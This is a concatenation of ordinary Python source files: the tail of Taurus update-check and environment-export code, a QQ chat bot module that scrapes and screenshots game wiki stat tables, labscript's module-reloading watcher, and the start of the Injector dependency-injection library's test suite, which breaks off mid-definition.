response = client.request('GET', addr, timeout=10)
data = response.json()
self.log.debug("Taurus updates info: %s", data)
mine = LooseVersion(VERSION)
latest = LooseVersion(data['latest'])
if mine != "DEV" and (mine < latest or data['needsUpgrade']):
msg = "There is newer version of Taurus %s available, consider upgrading. " \
"What's new: http://gettaurus.org/docs/Changelog/"
self.log.warning(msg, latest)
else:
self.log.debug("Installation is up-to-date")
except BaseException:
self.log.debug("Failed to check for updates: %s", traceback.format_exc())
self.log.warning("Failed to check for updates")
def eval_env(self):
"""
Should be done after `configure`
"""
envs = self.__get_envs_from_config()
envs = expand_envs_with_os(envs)
def apply_env(value, key, container):
if isinstance(value, str):
container[key] = custom_expandvars(value, envs)
BetterDict.traverse(self.config, apply_env)
self.__export_variables_to_os()
def __export_variables_to_os(self):
"""
Export all user-defined environment variables to the system.
Example:
settings:
env:
FOO: bbb/ccc
BAR: aaa
"""
envs = self.__get_envs_from_config()
for var_name in envs:
if envs[var_name] is None:
if var_name in os.environ:
os.environ.pop(var_name)
else:
os.environ[var_name] = envs[var_name]
self.log.debug("OS env: %s=%s", var_name, envs[var_name])
def __get_envs_from_config(self):
envs = self.config.get(SETTINGS, force_set=True).get("env", force_set=True)
envs[TAURUS_ARTIFACTS_DIR] = self.artifacts_dir
return envs
|
unit.py | import getopt
import logging
import multiprocessing
import os
import re
import shlex
import tempfile
import time
from urllib import parse
import requests
from PIL import Image
from bs4 import BeautifulSoup, Tag
from dogbot.cqsdk import CQImage
from mongoengine import QuerySet, Q
from selenium import webdriver
from config import config
from dogbot.cqsdk.utils import reply
from dogbot.models import Class, Unit
HEADERS = {
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36'
}
BASE_URL = 'http://wikiwiki.jp/aigiszuki/'
RARITY = '铜铁银金白黑蓝'
class UnitException(Exception):
pass
def get_status_pic(name):
"""
获取单位图片. 源来自 http://wikiwiki.jp/aigiszuki/
:param name: 单位全名. 找不到的话会抛出UnitException.
:return: 一个PIL的image实例, 可以用save方法保存.
"""
logging.info("Grabbing ...")
resp = requests.get(
BASE_URL + '?' + parse.urlencode({
"cmd": "edit",
"page": name
}, encoding="utf-8"),
headers=HEADERS
)
# 判断页面是否存在
match = re.findall("(?<=<textarea name=\"msg\" rows=\"26\" cols=\"100\">)[\s\S]*?(?=</textarea>)", resp.text)
if match[0] == "":
raise UnitException("Missing Page")
table = match[0].split("\n")
tokens = ['**ステータス', '**[[スキル]]', '**[[スキル覚醒]]', '**[[アビリティ]]', '**クラス特性']
ids = []
# 获取这几个section后面的id, 用来当锚点
for line in table:
for token in tokens:
if token in line:
id = re.findall("(?<=\[#).*?(?=\])", line)[-1]
ids.append(id)
# print(repr(ids))
# 获取属性页面
resp = requests.get(
''.join((
BASE_URL,
"?",
parse.quote(name, encoding="euc-jp")
)),
headers=HEADERS
)
logging.info("Parsing...")
# 分析页面
soup = BeautifulSoup(resp.text, "lxml")
# 样式
css = """<style>
*{padding:0;margin:0;font-size: 95%;}
body{opacity:0.9;background:white;background-size:800px;width:900px;font-family:"PixelMPlus12", "Pingfang SC","Microsoft Yahei", "Wenquanyi Micro Hei" ;}
.floatleft, .floatLeft{float: left;margin-right: 3px;}
.clear{display: block;visibility: visible;min-height: 0;clear: both;}
a{color: #006FD6;text-decoration: none;outline: none;}
.wrapTable{width:100%}
table{border-spacing: 0;margin: 0 0 6px;border: #ccc 1px solid;}
.style_td {background-color: #fafafa!important;padding: 5px;margin: 1px;border: 1px solid #e0e0e0;}
.style_th {padding: 5px;margin: 1px;background-color: #EEEEEE;border: 1px solid #e0e0e0;}
#h3_content_1_1 + .ie5 .style_td, #h3_content_1_5 + .ie5 .style_td{padding: 5px;margin: 1px;background-color: #EEEEEE!important;}
h3, h1{border-bottom: 1px solid #a2a9b1;font-size: 20px;margin-bottom: 10px;}
.anchor_super, .jumpmenu {display: none}
h3 a {color: black!important}
h4 {margin-bottom: 10px;}
</style>"""
for a in soup.find_all("a"):
# 删掉所有的编辑
if a and "編集" in str(a):
a.decompose()
# utf8
inner_html = ['<meta charset="utf-8" />', css]
last_modified_str = soup.find(id='lastmodified').text
last_modified_day = re.findall('\d\d\d\d-\d\d-\d\d', last_modified_str)[0]
last_modified_time = re.findall('\d+:\d+:\d+', last_modified_str)[0]
inner_html.append('<h1>{}</h1><h2>本地更新时间: {}</h2><h2>页面更新时间: {}</h2>'.format(
name,
time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time())),
last_modified_day + ' ' + last_modified_time
))
# 拆section
for id in ids:
html = soup.find("a", id=id)
if html:
html = html.parent
tag = html.name
inner_html.append(str(html).replace('\n', ''))
html = html.findNext('div')
inner_html.append(str(html).replace('\n', ''))
for sb in html.next_siblings:
if type(sb) == Tag:
if sb.get('id') == 'h4_content_1_2':
break
if sb.name == tag:
break
inner_html.append(str(sb).replace("\n", ""))
inner_html = "".join(inner_html)
# 在temp文件夹下工作
with tempfile.TemporaryDirectory() as tmpdir:
with open(os.path.join(tmpdir, 'cache.html'), 'w', encoding='utf-8') as fp:
fp.write(inner_html)
logging.info("Capturing...")
driver = webdriver.PhantomJS()
driver.get(os.path.join(tmpdir, 'cache.html'))
# 截图
driver.save_screenshot(os.path.join(tmpdir, name + ".png"))
driver.quit()
logging.info("Converting...")
# 转换成RGB, 可以小一些, 也方保存成jpg
image = Image.open(os.path.join(tmpdir, name + ".png")).convert("RGB")
logging.info("Done!")
return image
def get_conne_pic(names, sorter=None, hidden_fields=[14, 15, 16, 20, 24]):
"""
获取圆爹dps表的图片. 提供过滤与排序的功能.
:param names: str list, 圆爹版的单位名称表. str可为正则.
:param sorter: 排序列, 为1开始的正整数.
:param hidden_fields: 要隐藏的列.
:return: 一个PIL的image实例, 可以用save方法保存.
"""
logging.info("Grabbing ...")
resp = requests.get(
'http://www116.sakura.ne.jp/~kuromoji/aigis_dps.htm',
headers=HEADERS
)
logging.info("Parsing...")
resp.encoding = 'shift-jis'
soup = BeautifulSoup(resp.text, "lxml")
# 找到主表
table = soup.find('table', id='sorter')
thead = table.thead
tbody = table.tbody
trs = []
# 遍历参数, 拆出相应的tr
inexistence = []
for name in names:
tds = tbody.find_all(text=re.compile('^' + name + '$'))
if not tds:
inexistence.append(name)
continue
for td in tds:
tr = td.parent.parent.parent
tds_ = tr.find_all('td')
trs.append(tr.extract())
if sorter:
trs.sort(key=lambda tr: int(tr.find_all('td')[sorter - 1].text) if tr.find_all('td')[sorter - 1].text else 0, reverse=True)
tbody.clear()
for tr in trs:
tbody.append(tr)
# 构造新页面
new_soup = BeautifulSoup('<html><head><meta charset="utf-8"></head><body></body></html>', 'lxml')
for css in soup.find_all('link'):
if css.get('href'):
css['href'] = 'http://www116.sakura.ne.jp/~kuromoji/' + css.get('href')
new_soup.html.head.append(css)
new_soup.html.body.append(table)
# new_soup.html.body.append(BeautifulSoup('<div id="calc" class="clear"></div>', 'lxml'))
widths = [3, 7, 10, 1.25, 3.25, 3.25, 3, 3, 2, 2, 2, 3.75, 2.5, 3.25, 3.25, 10.50, 3, 3.25, 3, 2, 3.25, 3.25, 3.25, 3.25, 3.25, 3.25, 3.25]
width = 0
for w in widths:
width += w
csses = ['<style>']
for field in hidden_fields:
width -= widths[field - 1]
csses.append('.aigis_dps tr td:nth-of-type({}){{display:none}}'.format(field))
csses.append('.aigis_dps tr th:nth-of-type({}){{display:none}}'.format(field))
csses.append('</style>')
new_soup.html.head.append(BeautifulSoup(''.join(csses), 'lxml'))
# 圆爹页上爬下来的部分css
new_soup.html.head.append(BeautifulSoup(
('<style>'
'a,abbr,acronym,address,applet,article,aside,audio,b,big,blockquote,body,canvas,caption,center,cite,code,dd,del,details,dfn,div,dl,dt,em,embed,fieldset,figcaption,figure,footer,form,h1,h2,h3,h4,h5,h6,header,hgroup,html,i,iframe,img,ins,kbd,label,legend,li,mark,menu,nav,object,ol,output,p,pre,q,ruby,s,samp,section,small,span,strike,strong,sub,summary,sup,table,tbody,td,tfoot,th,thead,time,tr,tt,u,ul,var,video{{margin:0;padding:0;border:0;font-size:100%;font:inherit;vertical-align:baseline}}article,aside,details,figcaption,figure,footer,header,hgroup,menu,nav,section{{display:block}}body{{line-height:1}}ol,ul{{list-style:none}}blockquote,q{{quotes:none}}blockquote:after,blockquote:before,q:after,q:before{{content:'';content:none}}table{{border-collapse:collapse;border-spacing:0}}'
'table{{line-height: 1.125;}}'
'td,th{{vertical-align:middle}}'
'tr.hyde {{display: table-row;}}'
'body{{font-size: 70%;width: {}em;font-family:"PixelMPlus12", "Pingfang SC",\"Microsoft Yahei\", \"Wenquanyi Micro Hei\";}}'
'</style>'.format(width + 10))
, 'lxml'))
# 写入html
with tempfile.TemporaryDirectory() as tmpdir:
with open(os.path.join(tmpdir, 'cache.html'), 'w', encoding='utf-8') as fp:
fp.write(str(new_soup))
# with open('cache.html', 'w', encoding='utf-8') as fp:
# fp.write(str(new_soup))
logging.info("Capturing...")
driver = webdriver.PhantomJS()
driver.get(os.path.join(tmpdir, 'cache.html'))
driver.save_screenshot(os.path.join(tmpdir, 'cache.png'))
driver.quit()
logging.info("Converting...")
# 转换成RGB, 可以小一些, 也方保存成jpg
image = Image.open(os.path.join(tmpdir, "cache.png")).convert('RGB')
logging.info("Done!")
return inexistence, image
def status_worker(bot, message, name, refresh):
"""
获取属性图的进程worker.
"""
full_path = os.path.join(config['cq_root_dir'], config['cq_image_dir'], 'unit', name + '.png')
if not os.path.exists(os.path.join(config['cq_root_dir'], config['cq_image_dir'], 'unit')):
os.mkdir(os.path.join(config['cq_root_dir'], config['cq_image_dir'], 'unit'))
# 没有缓存或者要求刷新的情况
if not os.path.exists(full_path) or refresh:
try:
image = get_status_pic(name)
except UnitException as e:
reply(bot, message, str(e))
return
except Exception as e:
reply(bot, message, '汪汪汪? 可能是网络问题, 重试一下吧')
raise e
return
image.save(full_path)
reply(bot, message, str(CQImage(os.path.join("unit", name + ".png"))))
def status(bot, message):
"""#status [-h] [-f] 单位
-h : 打印本帮助
-f : 强制刷新
单位 : 可以是单位黑话, 原名, 也可以是职业名; 懒到一定程度的话可以直接 稀有+职业的形式
例:
#status 狗蛋
#status 猫又 (猫又是职业)
#status 黑风水 (将被拆成黑+风水)
"""
try:
cmd, *args = shlex.split(message.text)
except ValueError:
return False
if not cmd[0] in config['trigger']:
return False
if not cmd[1:] == 'status':
return False
try:
options, args = getopt.gnu_getopt(args, 'hf')
except getopt.GetoptError:
# 格式不对
reply(bot, message, status.__doc__)
return True
refresh = False
# 拆参数
for o, a in options:
if o == '-h':
# 帮助
reply(bot, message, status.__doc__)
return True
elif o == '-f':
refresh = True
# 必须要有单位参数
if len(args) < 1:
reply(bot, message, status.__doc__)
return True
target_name = args[0]
# 找单位
target = Unit.objects(Q(name=target_name) | Q(nickname=target_name)).first()
# 看看是不是职业名
if not target:
class_ = Class.objects(Q(name=target_name) | Q(translate=target_name) | Q(nickname=target_name)).first()
if class_:
target = Unit.objects(class_=class_)
# 看看是不是稀有度 + 职业名
if not target:
rarity = RARITY.find(target_name[:1])
if rarity != -1:
class_name = target_name[1:]
class_ = Class.objects(Q(name=class_name) | Q(translate=class_name) | Q(nickname=class_name)).first()
if not class_:
reply(bot, message, '没找到职业{}'.format(class_name))
return True
target = Unit.objects(Q(class_=class_) & Q(rarity=rarity))
# 结果是不是一个列表
if type(target) == QuerySet:
# 多于一个结果, 返回结果列表
if len(target) > 1:
msg = '{}不止一个单位...以下列出所有单位名\n'.format(target_name)
for unit in target:
msg += '\n[{}][{}]{}'.format(RARITY[unit.rarity], unit.class_.name, unit.name)
reply(bot, message, msg)
return True
# 只有一个结果, 就是它了
elif len(target) == 1:
target = target[0]
# 怎么还没找到的, 丢人
if not target:
reply(bot, message, '没找到{}...'.format(target_name))
return True
reply(bot, message, '{}, 汪'.format(target.name))
# 开一个新进程去抓图
multiprocessing.Process(target=status_worker, args=(bot, message, target.name, refresh)).start()
return True
SORTER_ALIAS = {
'hp': 6,
'atk': 7,
'def': 8,
'mr': 9,
'dps': 21
}
def conne_worker(bot, message, names, full=False, sorter=None):
"""
获取圆爹的进程worker.
"""
file_name = 'conne' + str(int(time.time())) + '.png'
full_path = os.path.join(config['cq_root_dir'], config['cq_image_dir'], file_name)
hidden_fields = [14, 15, 16, 20, 24]
if full:
hidden_fields = []
try:
inexistence, image = get_conne_pic(names, sorter, hidden_fields)
except Exception as e:
reply(bot, message, '汪汪汪? 可能是网络问题, 重试一下吧')
raise e
return
if inexistence:
# 有没找到的话提示哪些没找到ff
reply(bot, message, '以下单位圆爹站好像没找到: {}'.format(', '.join(inexistence)))
if not len(inexistence) == len(names):
# 不是一个都没找到就行
image.save(full_path)
reply(bot, message, CQImage(file_name))
def conne(bot, message):
"""#conne [-h] [-f] [-s sorter] 单位...
-h : 打印本帮助
-f : 输出所有的列. 默认隐藏: 物理一击线, 魔法一击线, 补足, 属性, 600防dps
-s sorter : 排序. 接受以下参数: hp, atk, def, mr, dps
单位... : 可以是单位黑话, 原名, 也可以是职业名. 接受多个单位, 空格隔开.
注: 圆爹只收录了金以上的单位.
例:
#conne 狗蛋
#conne -s dps 风水
#conne -f -s atk 狮子奶 冬马
"""
try:
cmd, *args = shlex.split(message.text)
except ValueError:
return False
if not cmd[0] in config['trigger']:
return False
if not cmd[1:] == 'conne':
return False
try:
options, args = getopt.gnu_getopt(args, 'hfs:')
except getopt.GetoptError:
# 格式不对
reply(bot, message, conne.__doc__)
return True
full_fields = False
sorter = None
# 拆参数
for o, a in options:
if o == '-h':
# 帮助
reply(bot, message, conne.__doc__)
return True
elif o == '-f':
full_fields = True
elif o == '-s':
if SORTER_ALIAS.get(a):
sorter = SORTER_ALIAS.get(a)
else:
reply(bot, message, conne.__doc__)
return True
# 必须要有单位参数
if len(args) < 1:
reply(bot, message, conne.__doc__)
return True
names = []
for target_name in args:
# 找单位
target = Unit.objects(Q(name=target_name) | Q(nickname=target_name)).first()
# 不是单位的话找职业
if not target:
class_ = Class.objects(Q(name=target_name) | Q(translate=target_name) | Q(nickname=target_name)).first()
if class_:
target = Unit.objects(Q(class_=class_) & Q(rarity__gte=3))
# 看看是不是稀有度 + 职业名
if not target:
rarity = RARITY.find(target_name[:1])
if not rarity == -1:
class_name = target_name[1:]
class_ = Class.objects(Q(name=class_name) | Q(translate=class_name) | Q(nickname=class_name)).first()
if not class_:
reply(bot, message, '没找到职业{}'.format(class_name))
return True
target = Unit.objects(Q(class_=class_) & Q(rarity=rarity))
if not target:
reply(bot, message, '找不到单位{}...'.format(target_name))
return True
if not type(target) == QuerySet:
target = (target,)
for unit in target:
try:
names.index(unit.conne_name)
except ValueError:
names.append(unit.conne_name)
reply(bot, message, '汪')
# 开一个新进程去抓图
multiprocessing.Process(target=conne_worker, args=(bot, message, names, full_fields, sorter)).start()
return True
if __name__ == '__main__':
logging.getLogger().setLevel(logging.INFO)
logging.basicConfig(level=logging.INFO,
format='[%(asctime)s] %(levelname)s: %(message)s',
datefmt='%d %b %Y %H:%M:%S',
filename='unit.log',
filemode='w')
console = logging.StreamHandler()
console.setLevel(logging.INFO)
formatter = logging.Formatter('[%(asctime)s] %(levelname)s: %(message)s')
console.setFormatter(formatter)
logging.getLogger('').addHandler(console)
logging.info("Running...")
inexistence, image = get_conne_pic(('シビラ', ))
image.show()
# get_status_pic('刻詠の風水士リンネ')
|
modulewatcher.py | #####################################################################
# #
# modulewatcher.py #
# #
# Copyright 2013, Monash University #
# #
# This file is part of the labscript suite (see #
# http://labscriptsuite.org) and is licensed under the Simplified #
# BSD License. See the license.txt file in the root of the project #
# for the full license. #
# #
#####################################################################
from __future__ import division, unicode_literals, print_function, absolute_import
import sys
import threading
import time
import os
import imp
class ModuleWatcher(object):
def __init__(self, debug=False):
self.debug = debug
# A lock to hold whenever you don't want modules unloaded:
self.lock = threading.Lock()
# The whitelist is the list of names of currently loaded modules:
self.whitelist = set(sys.modules)
self.modified_times = {}
self.main = threading.Thread(target=self.mainloop)
self.main.daemon = True
self.main.start()
def mainloop(self):
while True:
time.sleep(1)
with self.lock:
self.check_and_unload()
def check_and_unload(self):
# Look through currently loaded modules:
for name, module in sys.modules.copy().items():
# Look only at the modules not in the the whitelist:
if name not in self.whitelist and hasattr(module,'__file__'):
# Only consider modules which are .py files, no C extensions:
module_file = module.__file__.replace('.pyc', '.py')
if not module_file.endswith('.py') or not os.path.exists(module_file):
continue
# Check and store the modified time of the .py file:
modified_time = os.path.getmtime(module_file)
previous_modified_time = self.modified_times.setdefault(name, modified_time)
self.modified_times[name] = modified_time
if modified_time != previous_modified_time:
# A module has been modified! Unload all modules
# not in the whitelist:
message = '%s modified: all modules will be reloaded next run.\n'%module_file
sys.stderr.write(message)
if self.debug:
print("ModuleWatcher: whitelist is:")
for name in sorted(self.whitelist):
print(" " + name)
print("\nModuleWatcher: modules unloaded:")
# Acquire the import lock so that we don't unload
# modules whilst an import is in progess:
imp.acquire_lock()
try:
for name in sorted(sys.modules):
if name not in self.whitelist:
# This unloads a module. This is slightly
# more general than reload(module), but
# has the same caveats regarding existing
# references. This also means that any
# exception in the import will occur later,
# once the module is (re)imported, rather
# than now where catching the exception
# would have to be handled differently.
del sys.modules[name]
if name in self.modified_times:
del self.modified_times[name]
if self.debug:
print(" " + name)
finally:
# We're done mucking around with the cached
# modules, normal imports in other threads
# may resume:
imp.release_lock()
|
injector_test.py | # encoding: utf-8
#
# Copyright (C) 2010 Alec Thomas <alec@swapoff.org>
# All rights reserved.
#
# This software is licensed as described in the file COPYING, which
# you should have received as part of this distribution.
#
# Author: Alec Thomas <alec@swapoff.org>
"""Functional tests for the "Injector" dependency injection framework."""
from contextlib import contextmanager
from typing import Any, NewType
import abc
import threading
import traceback
import warnings
import pytest
from injector import (
Binder, CallError, Injector, Scope, InstanceProvider, ClassProvider,
inject, noninjectable, singleton, threadlocal, UnsatisfiedRequirement,
CircularDependency, Module, Key, SingletonScope,
ScopeDecorator, with_injector, AssistedBuilder, BindingKey,
SequenceKey, MappingKey, provider, ProviderOf, ClassAssistedBuilder,
Error, UnknownArgument,
)
def prepare_basic_injection():
class B:
pass
class A:
@inject
def __init__(self, b: B):
"""Construct a new A."""
self.b = b
return A, B
def prepare_nested_injectors():
def configure(binder):
binder.bind(str, to='asd')
parent = Injector(configure)
child = parent.create_child_injector()
return parent, child
def check_exception_contains_stuff(exception, stuff):
stringified = str(exception)
for thing in stuff:
assert thing in stringified, (
'%r should be present in the exception representation: %s' % (
thing, stringified))
def test_child_injector_inherits_parent_bindings():
parent, child = prepare_nested_injectors()
assert (child.get(str) == parent.get(str))
def test_child_injector_overrides_parent_bindings():
parent, child = prepare_nested_injectors()
child.binder.bind(str, to='qwe')
assert ((parent.get(str), child.get(str)) == ('asd', 'qwe'))
def test_child_injector_rebinds_arguments_for_parent_scope():
I = Key("interface")
Cls = Key("test_class")
class A:
@inject
def __init__(self, val: I):
self.val = val
def configure_parent(binder):
binder.bind(Cls, to=A)
binder.bind(I, to="Parent")
def configure_child(binder):
binder.bind(I, to="Child")
parent = Injector(configure_parent)
assert (parent.get(Cls).val == "Parent")
child = parent.create_child_injector(configure_child)
assert (child.get(Cls).val == "Child")
def test_scopes_are_only_bound_to_root_injector():
parent, child = prepare_nested_injectors()
class A:
pass
parent.binder.bind(A, to=A, scope=singleton)
assert (parent.get(A) is child.get(A))
def test_key_cannot_be_instantiated():
Interface = Key('Interface')
with pytest.raises(Exception):
Interface()
with pytest.raises(Exception):
Injector().get(Interface)
def test_get_default_injected_instances():
A, B = prepare_basic_injection()
def configure(binder):
binder.bind(A)
binder.bind(B)
injector = Injector(configure)
assert (injector.get(Injector) is injector)
assert (injector.get(Binder) is injector.binder)
def test_instantiate_injected_method():
A, _ = prepare_basic_injection()
a = A('Bob')
assert (a.b == 'Bob')
def test_method_decorator_is_wrapped():
A, _ = prepare_basic_injection()
assert (A.__init__.__doc__ == 'Construct a new A.')
assert (A.__init__.__name__ == '__init__')
def test_decorator_works_for_function_with_no_args():
@inject
def wrapped(*args, **kwargs):
pass
def test_providers_arent_called_for_dependencies_that_are_already_provided():
def configure(binder):
binder.bind(int, to=lambda: 1 / 0)
class A:
@inject
def __init__(self, i: int):
pass
injector = Injector(configure)
builder = injector.get(AssistedBuilder[A])
with pytest.raises(ZeroDivisionError):
builder.build()
builder.build(i=3)
def test_inject_direct():
A, B = prepare_basic_injection()
def configure(binder):
binder.bind(A)
binder.bind(B)
injector = Injector(configure)
a = injector.get(A)
assert (isinstance(a, A))
assert (isinstance(a.b, B))
def test_configure_multiple_modules():
A, B = prepare_basic_injection()
def configure_a(binder):
binder.bind(A)
def configure_b(binder):
binder.bind(B)
injector = Injector([configure_a, configure_b])
a = injector.get(A)
assert (isinstance(a, A))
assert (isinstance(a.b, B))
def test_inject_with_missing_dependency():
A, _ = prepare_basic_injection()
def configure(binder):
binder.bind(A)
injector = Injector(configure, auto_bind=False)
with pytest.raises(UnsatisfiedRequirement):
injector.get(A)
def test_inject_named_interface():
class B:
pass
class A:
@inject
def __init__(self, b: B):
self.b = b
def configure(binder):
binder.bind(A)
binder.bind(B)
injector = Injector(configure)
a = injector.get(A)
assert (isinstance(a, A))
assert (isinstance(a.b, B))
def prepare_transitive_injection():
class C:
pass
class B:
@inject
def __init__(self, c: C):
self.c = c
class A:
@inject
def __init__(self, b: B):
self.b = b
return A, B, C
def test_transitive_injection():
A, B, C = prepare_transitive_injection()
def configure(binder):
binder.bind(A)
binder.bind(B)
binder.bind(C)
injector = Injector(configure)
a = injector.get(A)
assert (isinstance(a, A))
assert (isinstance(a.b, B))
assert (isinstance(a.b.c, C))
def test_transitive_injection_with_missing_dependency():
A, B, _ = prepare_transitive_injection()
def configure(binder):
binder.bind(A)
binder.bind(B)
injector = Injector(configure, auto_bind=False)
with pytest.raises(UnsatisfiedRequirement):
injector.get(A)
with pytest.raises(UnsatisfiedRequirement):
injector.get(B)
def test_inject_singleton():
class B:
pass
class A:
@inject
def __init__(self, b: B):
self.b = b
def configure(binder):
binder.bind(A)
binder.bind(B, scope=SingletonScope)
injector1 = Injector(configure)
a1 = injector1.get(A)
a2 = injector1.get(A)
assert (a1.b is a2.b)
def test_inject_decorated_singleton_class():
@singleton
class B:
pass
class A:
@inject
def __init__(self, b: B):
self.b = b
def configure(binder):
binder.bind(A)
binder.bind(B)
injector1 = Injector(configure)
a1 = injector1.get(A)
a2 = injector1.get(A)
assert (a1.b is a2.b)
def test_threadlocal():
@threadlocal
class A:
def __init__(self):
pass
def configure(binder):
binder.bind(A)
injector = Injector(configure)
a1 = injector.get(A)
a2 = injector.get(A)
assert (a1 is a2)
a3 = [None]
ready = threading.Event()
def inject_a3():
a3[0] = injector.get(A)
ready.set()
threading.Thread(target=inject_a3).start()
ready.wait(1.0)
assert (a2 is not a3[0] and a3[0] is not None)
def test_injecting_interface_implementation():
class Interface:
pass
class Implementation:
pass
class A:
@inject
def __init__(self, i: Interface):
self.i = i
def configure(binder):
binder.bind(A)
binder.bind(Interface, to=Implementation)
injector = Injector(configure)
a = injector.get(A)
assert (isinstance(a.i, Implementation))
def test_cyclic_dependencies():
class Interface:
pass
class A:
@inject
def __init__(self, i: Interface):
self.i = i
class B:
@inject
def __init__(self, a: A):
self.a = a
def configure(binder):
binder.bind(Interface, to=B)
binder.bind(A)
injector = Injector(configure)
with pytest.raises(CircularDependency):
injector.get(A)
def test_dependency_cycle_can_be_worked_broken_by_assisted_building():
class Interface:
pass
class A:
@inject
def __init__(self, i: Interface):
self.i = i
class B:
@inject
def __init__(self, a_builder: AssistedBuilder[A]):
self.a = a_builder.build(i=self)
def configure(binder):
binder.bind(Interface, to=B)
binder.bind(A)
injector = Injector(configure)
# Previously it'd detect a circular dependency here:
# 1. Constructing A requires Interface (bound to B)
# 2. Constructing B requires assisted build of A
# 3. Constructing A triggers circular dependency check
assert isinstance(injector.get(A), A)
def test_that_injection_is_lazy():
class Interface:
constructed = False
def __init__(self):
Interface.constructed = True
class A:
@inject
def __init__(self, i: Interface):
self.i = i
def configure(binder):
binder.bind(Interface)
binder.bind(A)
injector = Injector(configure)
assert not (Interface.constructed)
injector.get(A)
assert (Interface.constructed)
def test_module_provider():
class MyModule(Module):
@provider
def provide_name(self) -> str:
return 'Bob'
module = MyModule()
injector = Injector(module)
assert injector.get(str) == 'Bob'
def test_module_class_gets_instantiated():
name = 'Meg'
class MyModule(Module):
def configure(self, binder):
binder.bind(str, to=name)
injector = Injector(MyModule)
assert (injector.get(str) == name)
def test_with_injector_works():
name = 'Victoria'
def configure(binder):
binder.bind(str, to=name)
class Aaa:
@with_injector(configure)
@inject
def __init__(self, username: str):
self.username = username
aaa = Aaa()
assert (aaa.username == name)
def test_bind_using_key():
Name = Key('name')
Age = Key('age')
class MyModule(Module):
@provider
def provider_name(self) -> Name:
return 'Bob'
def configure(self, binder):
binder.bind(Age, to=25)
injector = Injector(MyModule())
assert (injector.get(Age) == 25)
assert (injector.get(Name) == 'Bob')
def test_inject_using_key():
Name = Key('name')
Description = Key('description')
class MyModule(Module):
@provider
def provide_name(self) -> Name:
return 'Bob'
@provider
@inject
def provide_description(self, name: Name) -> Description:
return '%s is cool!' % name
assert (Injector(MyModule()).get(Description) == 'Bob is cool!')
def test_inject_and_provide_coexist_happily():
class MyModule(Module):
@provider
def provide_weight(self) -> float:
return 50.0
@provider
def provide_age(self) -> int:
return 25
# TODO(alec) Make provider/inject order independent.
@provider
@inject
def provide_description(self, age: int, weight: float) -> str:
return 'Bob is %d and weighs %0.1fkg' % (age, weight)
assert (Injector(MyModule()).get(str) == 'Bob is 25 and weighs 50.0kg')
def test_multibind():
Names = Key('names')
def configure_one(binder):
binder.multibind(Names, to=['Bob'])
def configure_two(binder):
binder.multibind(Names, to=['Tom'])
assert (Injector([configure_one, configure_two]).get(Names) == ['Bob', 'Tom'])
def test_provider_sequence_decorator():
Names = SequenceKey('names')
class MyModule(Module):
@provider
def bob(self) -> Names:
return ['Bob']
@provider
def tom(self) -> Names:
return ['Tom']
assert (Injector(MyModule()).get(Names) == ['Bob', 'Tom'])
def test_auto_bind():
class A:
pass
injector = Injector()
assert (isinstance(injector.get(A), A))
def test_custom_scope():
class RequestScope(Scope):
def configure(self):
self.context = None
@contextmanager
def __call__(self, request):
assert self.context is None
self.context = {}
binder = self.injector.get(Binder)
binder.bind(Request, to=request, scope=RequestScope)
yield
self.context = None
def get(self, key, provider):
if self.context is None:
raise UnsatisfiedRequirement(None, key)
try:
return self.context[key]
except KeyError:
provider = InstanceProvider(provider.get(self.injector))
self.context[key] = provider
return provider
request = ScopeDecorator(RequestScope)
class Request:
pass
@request
class Handler:
def __init__(self, request):
self.request = request
class RequestModule(Module):
def configure(self, binder):
binder.bind_scope(RequestScope)
@provider
@inject
def handler(self, request: Request) -> Handler:
return Handler(request)
injector = Injector([RequestModule()], auto_bind=False)
with pytest.raises(UnsatisfiedRequirement):
injector.get(Handler)
scope = injector.get(RequestScope)
request = Request()
with scope(request):
handler = injector.get(Handler)
assert (handler.request is request)
with pytest.raises(UnsatisfiedRequirement):
injector.get(Handler)
def test_bind_interface_of_list_of_types():
def configure(binder):
binder.multibind([int], to=[1, 2, 3])
binder.multibind([int], to=[4, 5, 6])
injector = Injector(configure)
assert (injector.get([int]) == [1, 2, 3, 4, 5, 6])
def test_provider_mapping():
StrInt = MappingKey('StrInt')
def configure(binder):
binder.multibind(StrInt, to={'one': 1})
binder.multibind(StrInt, to={'two': 2})
class MyModule(Module):
@provider
def provide_numbers(self) -> StrInt:
return {'three': 3}
@provider
def provide_more_numbers(self) -> StrInt:
return {'four': 4}
injector = Injector([configure, MyModule()])
assert (injector.get(StrInt) == {'one': 1, 'two': 2, 'three': 3, 'four': 4})
def test_binder_install():
class ModuleA(Module):
def configure(self, binder):
binder.bind(str, to='hello world')
class ModuleB(Module):
def configure(self, binder):
binder.install(ModuleA())
injector = Injector([ModuleB()])
assert (injector.get(str) == 'hello world')
def test_binder_provider_for_method_with_explicit_provider():
injector = Injector()
binder = injector.binder
provider = binder.provider_for(int, to=InstanceProvider(1))
assert (type(provider) is InstanceProvider)
assert (provider.get(injector) == 1)
def test_binder_provider_for_method_with_instance():
injector = Injector()
binder = injector.binder
provider = binder.provider_for(int, to=1)
assert (type(provider) is InstanceProvider)
assert (provider.get(injector) == 1)
def test_binder_provider_for_method_with_class():
injector = Injector()
binder = injector.binder
provider = binder.provider_for(int)
assert (type(provider) is ClassProvider)
assert (provider.get(injector) == 0)
def test_binder_provider_for_method_with_class_to_specific_subclass():
class A:
pass
class B(A):
pass
injector = Injector()
binder = injector.binder
provider = binder.provider_for(A, B)
assert (type(provider) is ClassProvider)
assert (isinstance(provider.get(injector), B))
def test_binder_provider_for_type_with_metaclass():
# use a metaclass cross python2/3 way
# otherwise should be:
# class A(object, metaclass=abc.ABCMeta):
# passa
A = abc.ABCMeta('A', (object, ), {})
injector = Injector()
binder = injector.binder
assert (isinstance(binder.provider_for(A, None).get(injector), A))
def test_injecting_undecorated_class_with_missing_dependencies_raises_the_right_error():
class ClassA:
def __init__(self, parameter):
pass
class ClassB:
@inject
def __init__(self, a: ClassA):
pass
injector = Injector()
try:
injector.get(ClassB)
except CallError as ce:
check_exception_contains_stuff(ce, ('ClassA.__init__', 'ClassB'))
def test_call_to_method_with_legitimate_call_error_raises_type_error():
class A:
def __init__(self):
max()
injector = Injector()
with pytest.raises(TypeError):
injector.get(A)
def test_call_error_str_representation_handles_single_arg():
ce = CallError('zxc')
assert str(ce) == 'zxc'
class NeedsAssistance:
@inject
def __init__(self, a: str, b):
self.a = a
self.b = b
def test_assisted_builder_works_when_got_directly_from_injector():
